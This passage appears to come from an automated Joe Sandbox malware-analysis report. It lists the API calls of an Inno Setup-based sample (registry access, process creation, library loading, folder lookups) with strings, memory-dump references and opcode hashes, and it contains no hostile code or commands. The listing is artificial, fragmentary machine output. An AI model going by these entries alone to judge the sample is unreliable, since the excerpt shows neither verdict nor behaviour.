                                                                                                    • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                                    APIs
                                                                                                    • SetActiveWindow.USER32(?), ref: 00482676
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ActiveWindow
                                                                                                    • String ID: InitializeWizard
                                                                                                    • API String ID: 2558294473-2356795471
                                                                                                    • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                    • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                                    • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                    • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                                    • API String ID: 47109696-1019749484
                                                                                                    • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                                    • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                                                                    • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                                    • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                                                                    APIs
                                                                                                    • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                    Strings
                                                                                                    • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID: Inno Setup: Setup Version
                                                                                                    • API String ID: 3702945584-4166306022
                                                                                                    • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                                    • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                                                                    • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                                    • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                                                                    APIs
                                                                                                    • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID: NoModify
                                                                                                    • API String ID: 3702945584-1699962838
                                                                                                    • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                                    • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                                                                    • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                                    • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                                                                    APIs
                                                                                                    • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                                      • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                                      • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                                      • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                                    • SendNotifyMessageA.USER32(000103F2,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 2649214853-0
                                                                                                    • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                                    • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                                                                    • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                                    • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                                      • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMetricsMultiSystemWide
                                                                                                    • String ID: /G
                                                                                                    • API String ID: 224039744-2088674125
                                                                                                    • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                                    • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                                    • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                                    • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                                    APIs
                                                                                                    • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                                      • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                      • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                      • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                      • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                    • String ID:
                                                                                                    • API String ID: 296031713-0
                                                                                                    • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                                    • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                                                    • Opcode Fuzzy Hash: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                                    • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                                                    APIs
                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                                    • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseEnum
                                                                                                    • String ID:
                                                                                                    • API String ID: 2818636725-0
                                                                                                    • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                    • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                                    • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                    • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2919029540-0
                                                                                                    • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                    • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                                    • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                    • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                                    APIs
                                                                                                    • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                                    • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 4097029671-0
                                                                                                    • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                    • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                                    • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                    • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                    • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$CurrentEnumWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2396873506-0
                                                                                                    • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                                    • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                                    • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                                    • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                                    APIs
                                                                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastMove
                                                                                                    • String ID:
                                                                                                    • API String ID: 55378915-0
                                                                                                    • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                    • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                                    • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                    • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                                    APIs
                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1375471231-0
                                                                                                    • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                    • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                                    • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                    • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                                    APIs
                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                                    • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CursorLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 3238433803-0
                                                                                                    • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                                    • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                                    • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                                    • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLibraryLoadMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2987862817-0
                                                                                                    • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                                    • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                                    • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                                    • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                                    APIs
                                                                                                    • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                                                                    • CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FolderFreeKnownPathTask
                                                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                    • API String ID: 969438705-544719455
                                                                                                    • Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
